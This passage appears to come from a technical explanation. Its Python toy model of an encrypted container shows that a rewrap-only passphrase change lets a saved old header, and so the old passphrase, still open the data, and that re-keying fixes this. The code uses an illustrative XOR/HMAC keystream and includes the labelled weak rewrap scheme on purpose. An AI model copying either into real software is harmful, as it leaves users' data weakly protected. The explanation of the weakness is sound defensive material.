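    only; a real container would use a block-cipher mode such as AES-XTS."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, label + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wrap_header(passphrase, master):
    """Passphrase block: salt, master key wrapped under the passphrase-derived key,
    and the tag that a 'wrong passphrase' dialog checks."""
    salt = os.urandom(16)
    kek = kdf(passphrase, salt)
    wrapped = xor(master, keystream(kek, b"wrap", len(master)))
    tag = hmac.new(kek, salt + wrapped, hashlib.sha256).digest()
    return {"salt": salt, "wrapped": wrapped, "tag": tag}


def unwrap_header(passphrase, header):
    """Return the master key, or None when the tag does not match (authentication fails)."""
    kek = kdf(passphrase, header["salt"])
    expected = hmac.new(kek, header["salt"] + header["wrapped"], hashlib.sha256).digest()
    if not hmac.compare_digest(expected, header["tag"]):
        return None
    return xor(header["wrapped"], keystream(kek, b"wrap", len(header["wrapped"])))


def encrypt_body(master, plaintext):
    ct = xor(plaintext, keystream(master, b"data", len(plaintext)))
    return {"ct": ct, "mac": hmac.new(master, ct, hashlib.sha256).digest()}


def create_container(passphrase, plaintext):
    master = os.urandom(32)
    return {"header": wrap_header(passphrase, master), "body": encrypt_body(master, plaintext)}


def open_container(passphrase, container):
    """Passphrase check first, then confirm the recovered master key really
    belongs to this body; None on either failure."""
    master = unwrap_header(passphrase, container["header"])
    if master is None:
        return None
    body = container["body"]
    if not hmac.compare_digest(hmac.new(master, body["ct"], hashlib.sha256).digest(), body["mac"]):
        return None
    return xor(body["ct"], keystream(master, b"data", len(body["ct"])))


def change_passphrase_rewrap(container, old, new):
    """Weak design: only the passphrase block is rewritten; master key and data stay put."""
    master = unwrap_header(old, container["header"])
    if master is None:
        raise ValueError("old passphrase rejected")
    return {"header": wrap_header(new, master), "body": container["body"]}


def change_passphrase_rekey(container, old, new):
    """Mitigation: generate a fresh master key and re-encrypt, so an earlier copy
    of the passphrase block no longer fits this container."""
    plaintext = open_container(old, container)
    if plaintext is None:
        raise ValueError("old passphrase rejected")
    return create_container(new, plaintext)


def with_saved_header(saved, current):
    """The situation the advisory describes: an earlier copy of the passphrase
    block put back onto the current body after the passphrase was changed."""
    return {"header": saved["header"], "body": current["body"]}
```

With re-wrap only, the earlier header still unwraps the unchanged master key and the body MAC verifies, so the old passphrase opens the disk exactly as the replies above describe. After re-keying, the earlier header still passes its own tag check (the dialog would accept it) but yields a key that fails the body MAC, so access is refused rather than silently returning garbage; the cost is re-encrypting the data on every passphrase change, which is why container formats that skip it carry this property.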